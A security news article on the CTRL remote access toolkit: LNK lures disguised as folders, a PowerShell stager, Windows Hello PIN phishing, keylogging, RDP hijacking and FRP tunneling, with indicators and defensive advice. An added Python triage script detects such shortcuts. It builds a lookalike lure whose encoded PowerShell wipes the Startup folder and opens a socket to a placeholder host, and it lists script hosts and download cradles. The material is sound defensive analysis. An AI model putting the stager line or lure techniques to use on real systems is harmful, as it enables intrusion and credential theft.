Russian-origin CTRL toolkit uses deceptive LNK files to deploy credential stealers, keyloggers, and RDP hijackers, tunneling operator access over FRP to leave minimal network forensic artifacts
Cybersecurity researchers have uncovered a sophisticated Russian-origin remote access toolkit called CTRL that's being distributed through malicious Windows shortcut (LNK) files disguised as private key folders. The toolkit, custom-built using .NET, enables credential phishing, keylogging, Remote Desktop Protocol (RDP) hijacking, and reverse tunneling via Fast Reverse Proxy (FRP).
According to Censys security researcher Andrew Northern, the CTRL toolkit includes various executables designed to facilitate encrypted payload loading, credential harvesting through a polished Windows Hello phishing UI, keylogging, RDP session hijacking, and reverse proxy tunneling through FRP.
Attack Chain and Delivery Mechanism
The attack begins with a weaponized LNK file named "Private Key #kfxm7p9q_yek.lnk" that carries a folder icon so the victim double-clicks it expecting a directory to open. Doing so kicks off a multi-stage loading chain:
- The LNK file launches a hidden PowerShell command that wipes existing persistence mechanisms from the victim's Windows Startup folder
- It decodes a Base64-encoded blob and runs it in memory
- A stager tests TCP connectivity to hui228[.]ru:7000 and downloads next-stage payloads
- The stager modifies firewall rules, sets up persistence using scheduled tasks, creates backdoor local users, and spawns a cmd.exe shell server on port 5267. That port is reached only through the FRP tunnel, so it never shows up as an internet-facing listener
The discovery came after Censys recovered CTRL from an open directory at 146.19.213[.]155 in February 2026.
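The chain above starts with a shortcut whose icon, window style and encoded PowerShell argument are all readable from the .lnk bytes without executing anything. The following Python triage script is an added example, not code from Censys or from the CTRL toolkit: it parses the Shell Link header and string data per MS-SHLLINK, decodes any -EncodedCommand payload (UTF-16LE Base64), and flags the lure pattern the article describes. The sample shortcut it builds is constructed for the demo (the "example.invalid" host and the one-line stage-zero script are placeholders, not the real payload); `parse_lnk` also skips the LinkTargetIDList and LinkInfo structures so it works on real shortcuts that carry them.

```python
"""Static triage of Windows .lnk files for the folder-icon + hidden PowerShell
+ -EncodedCommand lure pattern. Parser follows MS-SHLLINK; no execution."""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "webclient",
           "tcpclient", "test-netconnection", "invoke-restmethod", "start-bitstransfer")


def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and StringData of a .lnk; skip IDList and LinkInfo."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_command = struct.unpack_from("<iI", data, 56)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"flags": flags, "icon_index": icon_index, "show_command": show_command}
    for bit, name in STRING_FIELDS:                # fixed order per spec section 2.4
        if not flags & bit:
            fields[name] = ""
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def decode_encoded_command(arguments: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand (any prefix: -e, -enc, ...), or ''."""
    toks = arguments.split()
    for i, tok in enumerate(toks[:-1]):
        if len(tok) >= 2 and "-encodedcommand".startswith(tok.lower()):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def triage_lnk(data: bytes) -> dict:
    """Return parsed fields, the decoded payload, and finding codes for the lure pattern."""
    f = parse_lnk(data)
    decoded = decode_encoded_command(f["arguments"])
    launch = f"{f['relative_path']} {f['arguments']}".lower()
    script = decoded.lower()
    findings = []
    if any(h in launch for h in SCRIPT_HOSTS):
        findings.append("script_host")
    if f["show_command"] == SW_SHOWMINNOACTIVE or re.search(r"-w(?:indowstyle)?\s+hidden", launch):
        findings.append("hidden_window")
    # shell32.dll icon index 3 is the stock closed-folder icon; a .lnk borrowing it looks like a folder
    if f["icon_location"].lower().endswith("shell32.dll") and f["icon_index"] == 3:
        findings.append("folder_icon_disguise")
    if decoded:
        findings.append("encoded_command")
    if "startup" in script and re.search(r"remove-item|del |rmdir|rd ", script):
        findings.append("startup_folder_tamper")
    if any(c in script or c in launch for c in CRADLES):
        findings.append("download_cradle")
    return {"fields": f, "decoded_command": decoded, "findings": findings}


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              icon_index: int = 0, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk (no IDList/LinkInfo) so the parser can be exercised offline."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = (struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x20)  # ARCHIVE attr
              + b"\0" * 24                                   # three zeroed FILETIMEs
              + struct.pack("<IiI", 0, icon_index, show_command)
              + b"\0" * 12)                                  # HotKey + Reserved1..3

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + s(relative_path) + s(arguments) + s(icon_location)


# Constructed lookalike of the lure (NOT the real sample): wipe Startup, then open a TCP stager socket.
STAGE0 = ('Remove-Item "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" -Force;'
          ' $c = New-Object Net.Sockets.TcpClient("example.invalid", 7000)')
LURE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "-nop -w hidden -enc " + base64.b64encode(STAGE0.encode("utf-16-le")).decode(),
                     r"%SystemRoot%\System32\shell32.dll", icon_index=3,
                     show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "", "")

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        report = triage_lnk(blob)
        print(label, report["findings"])
        if report["decoded_command"]:
            print("  decoded:", report["decoded_command"])
```

Run it against a directory of quarantined shortcuts by reading each file's bytes into `triage_lnk`; a hit on `folder_icon_disguise` together with `script_host` and `encoded_command` is the signature of this lure, and the decoded stage-zero text is what you pivot on for the network indicators.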
CTRL Management Platform Architecture
One of the downloaded payloads, "ctrl.exe," functions as a .NET loader for launching an embedded payload called the CTRL Management Platform. This platform can serve as either a server or client depending on command-line arguments, with communication occurring over a Windows named pipe.
"The dual-mode design means the operator deploys ctrl.exe once on the victim (via the stager), then interacts with it by running ctrl.exe client through the FRP-tunneled RDP session," Northern explained. "The named pipe architecture keeps all C2 command traffic local to the victim machine — nothing traverses the network except the RDP session itself."
Credential Harvesting and Keylogging Capabilities
The toolkit's credential harvesting component launches as a Windows Presentation Foundation (WPF) application that mimics a real Windows PIN verification prompt. The module blocks attempts to escape the phishing window via keyboard shortcuts like Alt+Tab, Alt+F4, or F4, and checks each entered PIN by replaying it into the real Windows credential prompt through UI automation (the SendKeys() method), so only a PIN that Windows itself accepts is treated as valid.
"If the PIN is rejected, the victim is looped back with an error message," Northern said. "The window remains open even if the PIN successfully validates against the actual Windows authentication system. The captured PIN is logged with the prefix [STEALUSER PIN CAPTURED] to the same keylog file used by the background keylogger."
When ctrl.exe runs in server mode, the keylogger installs a keyboard hook in the background and appends every keystroke to "C:\Temp\keylog.txt", the same file the PIN phishing module writes its captures to.
Additional Attack Vectors
The toolkit includes commands to send toast notifications impersonating popular web browsers including Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Iron for additional credential theft or payload delivery.
Reverse Tunneling Infrastructure
Two additional payloads support the attack:
- FRPWrapper.exe: A Go DLL loaded in memory to establish reverse tunnels for RDP and the raw TCP shell through the operator's FRP server
- RDPWrapper.exe: Removes Windows' single-interactive-session limit so the operator's RDP session can run alongside the victim's without logging them off
Operational Security Features
"The toolkit demonstrates deliberate operational security. None of the three hosted binaries contain hard-coded C2 addresses," Censys noted. "All data exfiltration occurs through the FRP tunnel via RDP — the operator connects to the victim's desktop and reads keylog data through the ctrl named pipe."
Because every interaction rides an FRP reverse tunnel into an RDP session, the operator never produces the periodic outbound beacon that characterizes commodity RATs, so network-side detection has less to work with. What does remain is a long-lived outbound TCP session from the victim to the FRP server (the stager's connectivity check to port 7000 hints at where it goes), and, since the tunnel terminates on the victim itself, RDP logons whose source address is the local host rather than a workstation on the network.
Trend Toward Purpose-Built Toolkits
The CTRL toolkit represents a trend toward purpose-built, single-operator toolkits that prioritize operational security over feature breadth. This approach demonstrates how attackers are evolving to use more sophisticated, targeted methods that are harder to detect through traditional network monitoring.
The discovery highlights the ongoing evolution of cyber threats and the need for organizations to implement security measures that go beyond traditional antivirus: blocking or alerting on LNK files that launch script hosts, monitoring for RDP sessions that originate locally or through unfamiliar outbound tunnels, and hunting for the artifacts the stager leaves behind, including new scheduled tasks, newly created local users, firewall rule changes, and "C:\Temp\keylog.txt".